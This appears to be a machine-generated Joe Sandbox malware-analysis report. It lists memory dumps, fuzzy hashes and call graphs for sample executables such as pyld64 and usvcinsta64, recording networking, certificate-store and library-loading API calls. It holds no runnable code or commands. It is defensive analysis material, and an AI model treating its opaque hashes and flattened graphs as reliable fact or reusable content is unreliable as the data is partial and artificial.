                          • Opcode ID: b1403b4c9b76349453813f366b5515ddc48ecabc2ad87a5b831bc11eca843e65
                          • Instruction ID: 95f3fed40b7efaff98be51a89e3416b75517f72c27bebc466c8a43df0c5bb544
                          • Opcode Fuzzy Hash: b1403b4c9b76349453813f366b5515ddc48ecabc2ad87a5b831bc11eca843e65
                          • Instruction Fuzzy Hash: 79115B7260CB8082EB60EB15E450269BBE4FB88B88F584234EE8D47759DF3DC551CB00
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2442201936.00007FF7FC8E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7FC8E0000, based on PE: true
                          • Associated: 0000000E.00000002.2442152956.00007FF7FC8E0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 0000000E.00000002.2444309888.00007FF7FD755000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 0000000E.00000002.2444335818.00007FF7FD758000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_7ff7fc8e0000_pyld64.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 4c1b95cfeb29d36a2191ca800c4b776805e3dc359a3975e0c0840d805d58c9f8
                          • Instruction ID: dc4c43837b26b994d30c867c55cc00ff37de7dfc6b0870c3d0e838e6607a2deb
                          • Opcode Fuzzy Hash: 4c1b95cfeb29d36a2191ca800c4b776805e3dc359a3975e0c0840d805d58c9f8
                          • Instruction Fuzzy Hash: 93115136B14F018AEB00DF70E8552B873A4FB59768F840E35DA2D477A4DF38D2548390
                          APIs
                          Memory Dump Source
                          • Source File: 00000018.00000002.2514290910.00007FF6B8FA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B8FA0000, based on PE: true
                          • Associated: 00000018.00000002.2514115938.00007FF6B8FA0000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000018.00000002.2514383144.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000018.00000002.2516395872.00007FF6B9DA0000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000018.00000002.2516413364.00007FF6B9DA3000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_7ff6b8fa0000_usvcinsta64.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 708b7739343b0ed83ac0f76d64139286e1ea8fe78b9a00fa0674ff42a1f590b5
                          • Instruction ID: 46ad6b3313d5aa512539158ed786a66dd59f0658803ef29a4b255ce6d07b0c97
                          • Opcode Fuzzy Hash: 708b7739343b0ed83ac0f76d64139286e1ea8fe78b9a00fa0674ff42a1f590b5
                          • Instruction Fuzzy Hash: 3D114832B14F028AEB00CF74E8442A833A4FB2A759F041E31DB6D837A4DF38D1698344

                          Execution Graph

                          Execution Coverage:34.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:73
                          Total number of Limit Nodes:2

                          Callgraph

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000028.00000002.2603323584.00007FF68C621000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF68C620000, based on PE: true
                          • Associated: 00000028.00000002.2603302577.00007FF68C620000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000028.00000002.2603364581.00007FF68C624000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_40_2_7ff68c620000_printui.jbxd
                          Similarity
                          • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                          • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                          • API String ID: 2613610799-4035671587
                          • Opcode ID: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                          • Instruction ID: a2e38c170dce36f001aa98e3861e2c2eb697915b21fc9f1b116636c62b2ef146
                          • Opcode Fuzzy Hash: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                          • Instruction Fuzzy Hash: EDA12932A18A42CAEB118B60E4647B97BA0FF4DB99F415139DB1E87B54DF38D485D700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                          Memory Dump Source
                          • Source File: 00000028.00000002.2603323584.00007FF68C621000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF68C620000, based on PE: true
                          • Associated: 00000028.00000002.2603302577.00007FF68C620000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000028.00000002.2603364581.00007FF68C624000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_40_2_7ff68c620000_printui.jbxd
                          Similarity
                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                          • String ID:
                          • API String ID: 642454821-0
                          • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                          • Instruction ID: e2c88115207ee3f7db3dad7e61d92f6d9125ffb7aeae9590ddd1031f3ccf375b
                          • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                          • Instruction Fuzzy Hash: 2A612425A0D643C2EB628B11A960A3923A5BF8CB80F584139DA4DD36A4DF3DEDC1E700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 75 7ff68c621520-7ff68c621568 __wgetmainargs
                          APIs
                          Memory Dump Source
                          • Source File: 00000028.00000002.2603323584.00007FF68C621000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF68C620000, based on PE: true
                          • Associated: 00000028.00000002.2603302577.00007FF68C620000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000028.00000002.2603364581.00007FF68C624000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_40_2_7ff68c620000_printui.jbxd
                          Similarity
                          • API ID: __wgetmainargs
                          • String ID:
                          • API String ID: 1709950718-0
                          • Opcode ID: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                          • Instruction ID: 868366834460a14921c03b5fb98cd45c79ef633da5ef9b79d83795c249ea7a5a
                          • Opcode Fuzzy Hash: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                          • Instruction Fuzzy Hash: D8E07574E09E47D6EA12CB10E9609A4B768BF1C754B80003AC50D93720DF3CA289EB24

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000028.00000002.2603323584.00007FF68C621000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF68C620000, based on PE: true
                          • Associated: 00000028.00000002.2603302577.00007FF68C620000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000028.00000002.2603364581.00007FF68C624000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_40_2_7ff68c620000_printui.jbxd
                          Similarity
                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 4104442557-0
                          • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                          • Instruction ID: 62dd4c5125aa4d387c6ecf8000f50d0a643c2d84fb4c78bc1f207de11493f4c4
                          • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                          • Instruction Fuzzy Hash: BC111D22A04F41CAEB11DF60E86826833A4FB4C758F400A39EB6D87B54EF7CD6A4D340

                          Execution Graph

                          Execution Coverage:2.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:20.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:126
122948->122949 122950 7ffda55bb4a2 122948->122950 122978 7ffda55d5780 122949->122978 122950->122947 122951 7ffda55bb4b3 WSACleanup 122950->122951 122951->122949 122956 7ffda55d5780 6 API calls 122954->122956 122957 7ffda55bb51e GetProcAddress wcspbrk 122955->122957 122973 7ffda55bb512 122955->122973 122960 7ffda55bb77c 122956->122960 122958 7ffda55bb555 122957->122958 122959 7ffda55bb57d 122957->122959 122962 7ffda55bb56f LoadLibraryW 122958->122962 122966 7ffda55bb55d 122958->122966 122963 7ffda55bb5ac GetSystemDirectoryW 122959->122963 122964 7ffda55bb582 GetProcAddress 122959->122964 122960->122938 122961 7ffda55bb69e GetModuleHandleA 122965 7ffda55bb6c3 GetProcAddress GetProcAddress GetProcAddress 122961->122965 122972 7ffda55bb708 122961->122972 122962->122966 122963->122966 122968 7ffda55bb5c9 malloc 122963->122968 122964->122963 122967 7ffda55bb597 LoadLibraryW 122964->122967 122965->122972 122966->122961 122969 7ffda55bb682 GetProcAddress 122966->122969 122967->122966 122970 7ffda55bb65d free 122968->122970 122971 7ffda55bb5e2 GetSystemDirectoryW 122968->122971 122969->122961 122969->122973 122970->122966 122971->122970 122975 7ffda55bb5f2 122971->122975 122974 7ffda55bb74c QueryPerformanceFrequency 122972->122974 122973->122961 122974->122954 122976 7ffda55bb648 122975->122976 122977 7ffda55bb654 LoadLibraryW 122975->122977 122976->122970 122977->122976 122979 7ffda55d5789 122978->122979 122980 7ffda55bb4ce 122979->122980 122981 7ffda55d57d4 IsProcessorFeaturePresent 122979->122981 122980->122938 122982 7ffda55d57ec 122981->122982 122983 7ffda55d57f3 capture_previous_context 122981->122983 122982->122983 122986 7ffda55d57a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 122983->122986 122987 7ffda5586740 122988 7ffda558674f 122987->122988 122989 7ffda558675b 122987->122989 122990 7ffda5586774 122989->122990 122991 7ffda558678c 122989->122991 123013 7ffda55830a0 6 API calls 122990->123013 122993 7ffda558679d 
122991->122993 123003 7ffda55867cb 122991->123003 123014 7ffda55a4470 160 API calls 122993->123014 122994 7ffda5586780 122996 7ffda55867b2 122997 7ffda55867ba 122996->122997 122996->123003 122998 7ffda55867d4 122999 7ffda55868a1 123015 7ffda55a5610 37 API calls 122999->123015 123002 7ffda55868c1 123003->122998 123003->122999 123005 7ffda55a55e0 123003->123005 123008 7ffda55a54c0 123003->123008 123016 7ffda55a76b0 123005->123016 123082 7ffda55bf210 123008->123082 123010 7ffda55d5780 6 API calls 123011 7ffda55a55d6 123010->123011 123011->123003 123012 7ffda55a54ea 123012->123010 123013->122994 123014->122996 123015->123002 123022 7ffda55a7727 123016->123022 123055 7ffda55a7d1d 123016->123055 123017 7ffda55a773b 123018 7ffda55d5780 6 API calls 123017->123018 123020 7ffda55a55fd 123018->123020 123020->123003 123021 7ffda55a77ac 123023 7ffda55a77d3 malloc 123021->123023 123038 7ffda55a781e 123021->123038 123022->123017 123022->123055 123056 7ffda55a75c0 QueryPerformanceCounter GetTickCount 123022->123056 123024 7ffda55a77ea 123023->123024 123025 7ffda55a7819 123023->123025 123024->123017 123025->123038 123026 7ffda55a7a4c 123029 7ffda55a7a95 123026->123029 123057 7ffda55ae560 123026->123057 123027 7ffda55a79c5 WSAEventSelect 123031 7ffda55a7a68 123027->123031 123035 7ffda55a792f 123027->123035 123028 7ffda55a7972 getsockopt 123028->123035 123032 7ffda55a7cc8 123029->123032 123036 7ffda55a7aa6 WSAWaitForMultipleEvents 123029->123036 123044 7ffda55a7ac6 123029->123044 123031->123026 123033 7ffda55a7a6f free 123031->123033 123037 7ffda55a7ccf free 123032->123037 123048 7ffda55a7cda 123032->123048 123033->123026 123034 7ffda55a79af send 123034->123035 123035->123026 123035->123027 123035->123028 123035->123034 123036->123044 123037->123048 123038->123035 123039 7ffda55a7896 getsockopt 123038->123039 123040 7ffda55a78ef WSAEventSelect 123038->123040 123046 7ffda55a78d4 send 123038->123046 123039->123038 123040->123038 123043 7ffda55a7a4e 123040->123043 123041 7ffda55a7af0 
WSAEnumNetworkEvents 123041->123044 123045 7ffda55a7ba2 WSAEventSelect 123041->123045 123042 7ffda55a7cb0 WSAResetEvent 123042->123032 123043->123026 123047 7ffda55a7a55 free 123043->123047 123044->123041 123044->123045 123049 7ffda55a7b5a WSAEventSelect 123044->123049 123054 7ffda55a7bfd 123044->123054 123045->123044 123046->123038 123047->123031 123048->123055 123081 7ffda55a75c0 QueryPerformanceCounter GetTickCount 123048->123081 123049->123044 123051 7ffda55a7c40 WSAEnumNetworkEvents 123053 7ffda55a7c6b WSAEventSelect 123051->123053 123051->123054 123052 7ffda55a7cab 123052->123042 123053->123051 123053->123054 123054->123042 123054->123051 123054->123052 123054->123053 123056->123021 123058 7ffda55ae59a 123057->123058 123059 7ffda55ae5b4 123057->123059 123058->123059 123072 7ffda55ae5dd 123058->123072 123060 7ffda55ae915 123059->123060 123061 7ffda55ae8fe Sleep 123059->123061 123062 7ffda55ae5c3 WSASetLastError 123059->123062 123061->123060 123067 7ffda55ae76f 123062->123067 123063 7ffda55d5780 6 API calls 123064 7ffda55ae790 123063->123064 123064->123029 123065 7ffda55ae764 WSASetLastError 123065->123067 123066 7ffda55ae748 123068 7ffda55ae7cc 123066->123068 123070 7ffda55ae757 123066->123070 123067->123063 123069 7ffda55ae7d9 select 123068->123069 123071 7ffda55ae75c 123069->123071 123070->123071 123073 7ffda55ae7b0 Sleep 123070->123073 123074 7ffda55ae7a3 WSASetLastError 123070->123074 123075 7ffda55ae820 123071->123075 123080 7ffda55ae83d 123071->123080 123072->123065 123072->123066 123073->123071 123074->123071 123075->123067 123076 7ffda55ae829 WSAGetLastError 123075->123076 123076->123067 123077 7ffda55ae8f7 123077->123061 123078 7ffda55ae897 __WSAFDIsSet 123079 7ffda55ae8b5 __WSAFDIsSet 123078->123079 123078->123080 123079->123080 123080->123077 123080->123078 123080->123079 123081->123055 123083 7ffda55bf25d GetTickCount 123082->123083 123084 7ffda55bf222 QueryPerformanceCounter 123082->123084 123083->123012 123084->123012 123085 7ffd9426a950 123119 
7ffd942f9d10 123085->123119 123087 7ffd9426a99d GetModuleHandleExW 123088 7ffd9426a9bd 123087->123088 123089 7ffd9426a9d8 GetModuleFileNameW 123087->123089 123136 7ffd942ca510 8 API calls 2 library calls 123088->123136 123089->123088 123090 7ffd9426a9f1 123089->123090 123120 7ffd94248f40 104 API calls 5 library calls 123090->123120 123092 7ffd9426aba4 123094 7ffd9426aa26 123100 7ffd9426abe8 123094->123100 123113 7ffd9426aa30 123094->123113 123095 7ffd9426ac91 123096 7ffd9426adbb 123095->123096 123115 7ffd9426aca1 123095->123115 123097 7ffd942464f0 104 API calls 123096->123097 123116 7ffd9426ab0c 123096->123116 123097->123116 123098 7ffd9426ab8d 123098->123088 123100->123095 123137 7ffd94248f40 104 API calls 5 library calls 123100->123137 123101 7ffd9426ae2e 123139 7ffd942d97f4 102 API calls _invalid_parameter_noinfo_noreturn 123101->123139 123103 7ffd9426ac83 123107 7ffd942464f0 104 API calls 123103->123107 123104 7ffd9426ad66 123109 7ffd942464f0 104 API calls 123104->123109 123107->123095 123108 7ffd9426ae33 123140 7ffd942d97f4 102 API calls _invalid_parameter_noinfo_noreturn 123108->123140 123109->123116 123110 7ffd9426aafe 123122 7ffd942464f0 123110->123122 123121 7ffd94248f40 104 API calls 5 library calls 123113->123121 123138 7ffd94248f40 104 API calls 5 library calls 123115->123138 123116->123088 123116->123098 123116->123101 123116->123108 123119->123087 123120->123094 123121->123110 123126 7ffd9424651e 123122->123126 123123 7ffd94246613 123152 7ffd94242c50 104 API calls std::_Throw_Cpp_error 123123->123152 123126->123123 123127 7ffd9424660d 123126->123127 123128 7ffd9424653a ctype 123126->123128 123130 7ffd942465ad 123126->123130 123131 7ffd942465d4 123126->123131 123151 7ffd94242b80 104 API calls 2 library calls 123127->123151 123128->123116 123130->123127 123141 7ffd942ca538 123130->123141 123132 7ffd942ca538 std::_Facet_Register 104 API calls 123131->123132 123132->123128 123134 7ffd942465be 123134->123128 123150 7ffd942d97f4 102 API calls 
_invalid_parameter_noinfo_noreturn 123134->123150 123136->123092 123137->123103 123138->123104 123143 7ffd942ca543 123141->123143 123142 7ffd942ca55c 123142->123134 123143->123142 123145 7ffd942ca562 123143->123145 123153 7ffd942e5790 123143->123153 123146 7ffd942ca56d 123145->123146 123156 7ffd942c7b18 104 API calls Concurrency::cancel_current_task 123145->123156 123157 7ffd94242b80 104 API calls 2 library calls 123146->123157 123149 7ffd942ca573 std::_Facet_Register 123149->123134 123151->123123 123158 7ffd942e57e0 123153->123158 123157->123149 123163 7ffd942e4a90 EnterCriticalSection 123158->123163 123164 7ffda55cba86 123171 7ffda55cba8e 123164->123171 123165 7ffda55cbefb calloc 123166 7ffda55cbf1c 123165->123166 123167 7ffda55cc202 123165->123167 123286 7ffda55830a0 6 API calls 123166->123286 123172 7ffda55cc649 123167->123172 123238 7ffda55cc243 123167->123238 123168 7ffda55cbb29 123168->123165 123175 7ffda55cbb71 123168->123175 123176 7ffda55cbba3 wcschr 123168->123176 123277 7ffda55cbf4b 123168->123277 123170 7ffda55cbda5 123173 7ffda55cbf55 123170->123173 123177 7ffda55cbdbc CertOpenStore 123170->123177 123171->123168 123193 7ffda55cbb86 123171->123193 123178 7ffda55cc690 123172->123178 123263 7ffda55cc4d7 123172->123263 123293 7ffda5583190 6 API calls 123172->123293 123189 7ffda55cbf78 free 123173->123189 123190 7ffda55cbf83 123173->123190 123174 7ffda55cbf2b 123179 7ffda55cbf3b 123174->123179 123180 7ffda55cbf35 CertFreeCertificateContext 123174->123180 123175->123170 123186 7ffda55cbd76 123175->123186 123181 7ffda55cbbbc wcsncmp 123176->123181 123204 7ffda55cbd18 123176->123204 123191 7ffda55cbe4b free CryptStringToBinaryW 123177->123191 123192 7ffda55cbde4 123177->123192 123184 7ffda55cc697 123178->123184 123218 7ffda55cc6b0 123178->123218 123185 7ffda55cbf40 CertCloseStore 123179->123185 123179->123277 123180->123179 123187 7ffda55cbbdc wcschr 123181->123187 123188 7ffda55cbbe7 wcsncmp 123181->123188 123182 7ffda55d5780 6 API calls 123194 7ffda55cc941 
123182->123194 123294 7ffda55830a0 6 API calls 123184->123294 123185->123277 123284 7ffda55830a0 6 API calls 123186->123284 123187->123204 123213 7ffda55cbcda 123187->123213 123188->123187 123198 7ffda55cbc09 wcsncmp 123188->123198 123189->123190 123199 7ffda55cbf8c fseek 123190->123199 123226 7ffda55cc065 123190->123226 123200 7ffda55cbea8 CertFindCertificateInStore 123191->123200 123201 7ffda55cbe91 123191->123201 123210 7ffda55cbde9 GetLastError 123192->123210 123309 7ffda55830a0 6 API calls 123193->123309 123195 7ffda55cc8e0 123308 7ffda55830a0 6 API calls 123195->123308 123198->123187 123207 7ffda55cbc2b wcsncmp 123198->123207 123208 7ffda55cbfac ftell 123199->123208 123209 7ffda55cbffd 123199->123209 123202 7ffda55cbee5 123200->123202 123203 7ffda55cbed7 free 123200->123203 123214 7ffda55cbe9a free 123201->123214 123215 7ffda55cc1ed CertCloseStore 123201->123215 123202->123215 123217 7ffda55cbeee 123202->123217 123203->123202 123204->123175 123204->123195 123205 7ffda55cc6cb strtol 123205->123218 123219 7ffda55cc6e1 strchr 123205->123219 123207->123187 123221 7ffda55cbc4a wcsncmp 123207->123221 123208->123209 123222 7ffda55cbfbb 123208->123222 123209->123222 123224 7ffda55cc002 fseek 123209->123224 123285 7ffda55830a0 6 API calls 123210->123285 123213->123204 123236 7ffda55cbcf6 _wcsdup 123213->123236 123214->123215 123215->123277 123216 7ffda55cc099 malloc 123227 7ffda55cc149 123216->123227 123228 7ffda55cc0b3 123216->123228 123217->123165 123218->123205 123235 7ffda55cc7b4 strchr 123218->123235 123248 7ffda55cc76c strncmp 123218->123248 123218->123263 123278 7ffda55cc735 strncmp 123218->123278 123219->123218 123220 7ffda55cbda0 123245 7ffda55cbe38 free 123220->123245 123220->123277 123221->123187 123232 7ffda55cbc69 wcsncmp 123221->123232 123241 7ffda55cbfcc fread 123222->123241 123242 7ffda55cc02e fclose 123222->123242 123224->123222 123234 7ffda55cc01a malloc 123224->123234 123225 7ffda55cc8fb free 123225->123277 123226->123216 123226->123226 123239 
7ffda55cc157 123227->123239 123240 7ffda55cc14e free 123227->123240 123237 7ffda55cc0b8 MultiByteToWideChar 123228->123237 123274 7ffda55cc0ea 123228->123274 123229 7ffda55cc322 strchr 123229->123238 123230 7ffda55cc879 CertFreeCertificateContext 123231 7ffda55cc87f 123230->123231 123231->123277 123296 7ffda55b9b00 GetLastError _errno 123231->123296 123232->123187 123243 7ffda55cbc88 wcsncmp 123232->123243 123233 7ffda55cbe18 free 123233->123220 123244 7ffda55cbe26 free 123233->123244 123234->123222 123235->123218 123235->123263 123236->123177 123236->123204 123237->123274 123238->123229 123246 7ffda55cc469 123238->123246 123261 7ffda55cc35a strncmp 123238->123261 123238->123263 123271 7ffda55cc386 strncmp 123238->123271 123276 7ffda55cc3b7 strncmp 123238->123276 123280 7ffda55cc3eb strncmp 123238->123280 123281 7ffda55cc46b 123238->123281 123283 7ffda55cc41f strncmp 123238->123283 123249 7ffda55cc1a2 CertFindCertificateInStore 123239->123249 123250 7ffda55cc160 GetLastError 123239->123250 123240->123239 123241->123242 123251 7ffda55cbfe6 fclose 123241->123251 123253 7ffda55cc037 123242->123253 123243->123187 123252 7ffda55cbca7 wcsncmp 123243->123252 123244->123220 123245->123277 123246->123263 123270 7ffda55cc4bc 123246->123270 123248->123218 123259 7ffda55cc786 strncmp 123248->123259 123249->123217 123258 7ffda55cc1d0 GetLastError 123249->123258 123255 7ffda55cc189 123250->123255 123256 7ffda55cc173 123250->123256 123251->123253 123257 7ffda55cbff4 123251->123257 123252->123187 123252->123204 123287 7ffda55830a0 6 API calls 123253->123287 123289 7ffda55830a0 6 API calls 123255->123289 123288 7ffda55830a0 6 API calls 123256->123288 123257->123226 123290 7ffda55830a0 6 API calls 123258->123290 123259->123218 123267 7ffda55cc7dd 123259->123267 123261->123238 123263->123230 123263->123231 123295 7ffda55830a0 6 API calls 123267->123295 123268 7ffda55cc052 free 123268->123277 123292 7ffda55830a0 6 API calls 123270->123292 123271->123238 123272 7ffda55cc8a8 free 
123272->123277 123273 7ffda55cc17f 123273->123277 123279 7ffda55cc136 PFXImportCertStore free 123274->123279 123276->123238 123277->123182 123278->123218 123279->123227 123280->123238 123291 7ffda55830a0 6 API calls 123281->123291 123283->123238 123283->123281 123284->123220 123285->123233 123286->123174 123287->123268 123288->123273 123289->123277 123290->123215 123291->123277 123292->123277 123293->123178 123294->123277 123295->123277 123297 7ffda55b9b40 123296->123297 123301 7ffda55b9b47 123296->123301 123298 7ffda55d5780 6 API calls 123297->123298 123299 7ffda55ba07e 123298->123299 123307 7ffda55830a0 6 API calls 123299->123307 123305 7ffda55b9ba1 123301->123305 123310 7ffda55babe0 123301->123310 123302 7ffda55ba03b _errno 123303 7ffda55ba057 GetLastError 123302->123303 123304 7ffda55ba04e _errno 123302->123304 123303->123297 123306 7ffda55ba062 SetLastError 123303->123306 123304->123303 123305->123302 123306->123297 123307->123272 123308->123225 123309->123277 123311 7ffda55bac07 123310->123311 123312 7ffda55bac0e FormatMessageW 123310->123312 123315 7ffda55d5780 6 API calls 123311->123315 123313 7ffda55bac6f strchr 123312->123313 123314 7ffda55bac4e wcstombs 123312->123314 123313->123311 123316 7ffda55bac66 123314->123316 123317 7ffda55bacb7 123315->123317 123316->123313 123317->123305 123318 7ffda5576540 123319 7ffda557657e 123318->123319 123320 7ffda5576583 123318->123320 123319->123320 123324 7ffda5576702 123319->123324 123348 7ffda5577ee0 123319->123348 123322 7ffda55d5780 6 API calls 123320->123322 123323 7ffda55767dc 123322->123323 123324->123320 123328 7ffda5576770 123324->123328 123331 7ffda557674a 123324->123331 123326 7ffda5576649 123326->123320 123327 7ffda55766cd 123326->123327 123394 7ffda55784b0 13 API calls 123326->123394 123327->123320 123396 7ffda5578620 closesocket 123327->123396 123389 7ffda55787e0 SleepEx getsockopt 123328->123389 123331->123326 123338 7ffda55787e0 3 API calls 123331->123338 123332 7ffda55765ee WSAGetLastError 123392 
7ffda55784b0 13 API calls 123332->123392 123333 7ffda55765d6 connect 123333->123332 123337 7ffda5576667 WSASetLastError 123341 7ffda5576695 123337->123341 123338->123326 123339 7ffda5576602 123339->123324 123345 7ffda5576637 123339->123345 123340 7ffda557678b 123342 7ffda55bf210 2 API calls 123340->123342 123395 7ffda5583190 6 API calls 123341->123395 123343 7ffda5576795 123342->123343 123397 7ffda55784b0 13 API calls 123343->123397 123393 7ffda55786b0 6 API calls 123345->123393 123349 7ffda55bf210 2 API calls 123348->123349 123350 7ffda5577f1f 123349->123350 123398 7ffda5578740 123350->123398 123352 7ffda5577f3f 123356 7ffda5577fb0 123352->123356 123401 7ffda557b240 inet_ntop htons _errno 123352->123401 123354 7ffda5577f63 123357 7ffda5577f6b _errno _errno _errno 123354->123357 123358 7ffda5578009 123354->123358 123355 7ffda5578364 closesocket 123366 7ffda5577fe0 123355->123366 123356->123355 123356->123366 123360 7ffda5577f9b 123357->123360 123361 7ffda5578019 setsockopt 123358->123361 123362 7ffda5578047 123358->123362 123359 7ffda55d5780 6 API calls 123363 7ffda55765a4 123359->123363 123402 7ffda55830a0 6 API calls 123360->123402 123361->123362 123403 7ffda5583190 6 API calls 123362->123403 123363->123320 123363->123326 123363->123332 123363->123333 123366->123359 123367 7ffda5578064 123368 7ffda5578082 setsockopt 123367->123368 123373 7ffda55780d8 123367->123373 123369 7ffda55780af WSAGetLastError 123368->123369 123368->123373 123372 7ffda55780c6 123369->123372 123370 7ffda5578123 123376 7ffda55781b0 setsockopt 123370->123376 123383 7ffda5578283 123370->123383 123371 7ffda5578140 getsockopt 123374 7ffda5578171 setsockopt 123371->123374 123375 7ffda5578167 123371->123375 123404 7ffda5583190 6 API calls 123372->123404 123373->123370 123373->123371 123374->123370 123375->123370 123375->123374 123378 7ffda55781e0 WSAGetLastError 123376->123378 123381 7ffda55781f2 123376->123381 123379 7ffda5578275 123378->123379 123405 7ffda5583190 6 API calls 123379->123405 
123382 7ffda557821e WSAIoctl 123381->123382 123382->123383 123385 7ffda5578268 WSAGetLastError 123382->123385 123383->123356 123384 7ffda557831a 123383->123384 123384->123366 123406 7ffda55784b0 13 API calls 123384->123406 123385->123379 123387 7ffda5578344 123388 7ffda55bf210 2 API calls 123387->123388 123388->123366 123390 7ffda5578831 WSAGetLastError 123389->123390 123391 7ffda5576783 123389->123391 123390->123391 123391->123326 123391->123340 123392->123339 123393->123326 123394->123337 123395->123327 123396->123320 123397->123320 123399 7ffda5578762 123398->123399 123400 7ffda557878a socket 123398->123400 123399->123352 123400->123399 123401->123354 123402->123356 123403->123367 123404->123373 123405->123383 123406->123387 123407 7ffda55a623e 123427 7ffda55ab550 123407->123427 123409 7ffda55a6250 123430 7ffda55c1530 123409->123430 123412 7ffda55a6328 123414 7ffda55ab550 2 API calls 123412->123414 123415 7ffda55a62a3 123412->123415 123414->123415 123425 7ffda55a61d5 123415->123425 123445 7ffda557b6e0 123415->123445 123418 7ffda55a60d8 123419 7ffda55a7006 123420 7ffda55a61b5 123421 7ffda55a70fe 123421->123418 123453 7ffda55a4250 6 API calls 123421->123453 123425->123418 123425->123421 123452 7ffda55c1670 37 API calls 123425->123452 123428 7ffda55bf210 2 API calls 123427->123428 123429 7ffda55ab573 123428->123429 123429->123409 123454 7ffda55ac820 free free 123430->123454 123435 7ffda55a629b 123435->123412 123435->123415 123444 7ffda5583190 6 API calls 123435->123444 123436 7ffda55ab550 2 API calls 123437 7ffda55c15b1 123436->123437 123438 7ffda55bf210 2 API calls 123437->123438 123441 7ffda55c15c1 123437->123441 123439 7ffda55c15d8 123438->123439 123439->123441 123525 7ffda557b3d0 123439->123525 123441->123435 123536 7ffda55c1670 37 API calls 123441->123536 123444->123412 123446 7ffda557b710 123445->123446 123447 7ffda55bf210 2 API calls 123446->123447 123449 7ffda557b715 123446->123449 123447->123449 123448 7ffda55d5780 6 API calls 123450 7ffda557b7f0 
